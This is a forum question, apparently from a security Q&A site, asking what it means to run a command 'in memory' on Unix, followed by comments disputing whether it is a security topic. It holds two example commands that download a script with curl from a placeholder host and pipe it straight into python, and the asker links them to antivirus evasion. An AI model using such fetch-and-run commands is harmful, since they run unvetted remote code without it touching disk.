# What does it mean to "run a command in memory"?

Tags: memory, terminal, runtime

If I open a terminal and use the following commands, are they "run in memory"?

```
$ curl -s http://website.com/file.py | python - &

$ command=$(curl -s http://website.com/file.py); $(echo $command | python - &)
```

(I'm not sure that second example will actually work. I was just trying to come up with an example that utilized variables.)

In macOS (or any Unix system), what does it mean to run a command in memory?

**How do we run commands in memory?**

Comment: This is not a security question. You have tagged this as antivirus, so I assume that the answer is relevant to some other question you have about antivirus, but this question itself is not security-related. This is a basic OS question.

Comment: Hey @schroeder, I feel like you're trolling me a little here. Isn't executing shady commands into memory infosec and antivirus-related? I'm trying to learn more about how attackers evade antivirus detection using such commands.

Comment: Yes. I understand where you want to go with this, but this, itself, is not a security question.